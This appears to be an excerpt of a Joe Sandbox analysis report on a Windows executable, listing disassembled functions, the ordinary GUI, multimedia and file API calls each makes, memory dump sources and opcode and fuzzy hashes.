                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                  • API String ID: 2635119114-3819984048
                                                                                                                                                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                                                  Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                                                  • SendMessageW.USER32 ref: 00471740
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                                                  • SendMessageW.USER32 ref: 0047184F
                                                                                                                                                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4116747274-0
                                                                                                                                                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                                                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                                                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                                                                  Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                                                  • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoItemMenu$Sleep
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1196289194-4108050209
                                                                                                                                                                  • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                                                  • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                                                  Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                  • String ID: (
                                                                                                                                                                  • API String ID: 3300687185-3887548279
                                                                                                                                                                  • Opcode ID: a6765ff3558ea1b640c6d2273834e318a579f0ae09fc638cc24d305e3980b67b
                                                                                                                                                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                                  • Opcode Fuzzy Hash: a6765ff3558ea1b640c6d2273834e318a579f0ae09fc638cc24d305e3980b67b
                                                                                                                                                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                                  Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SendString$BuffCharDriveLowerType
                                                                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                  • API String ID: 1600147383-4113822522
                                                                                                                                                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                                  Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                                                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3969911579-0
                                                                                                                                                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                                                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                                                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                                                                  Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 956284711-4108050209
                                                                                                                                                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                                                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                                                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                                                                  Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SendString
                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                  • API String ID: 890592661-1007645807
                                                                                                                                                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                                                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                                                                  Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CharNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1350042424-0
                                                                                                                                                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                                  Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                                  • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                                                                  • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                                                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                  • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                                  • API String ID: 1834419854-3405671355
                                                                                                                                                                  • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                  • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                                  Function 0041B0B5 Relevance: 18.5, APIs: 12, Instructions: 494COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
                                                                                                                                                                  • Instruction ID: b1ff9d02dd699c4c9237f7ef83bd3b9726f1dd7de931cba3e9e58faaac2e4408
                                                                                                                                                                  • Opcode Fuzzy Hash: 6010c43569844335b52bd577acf76465956b309f5f524951a45990a878f18f6f
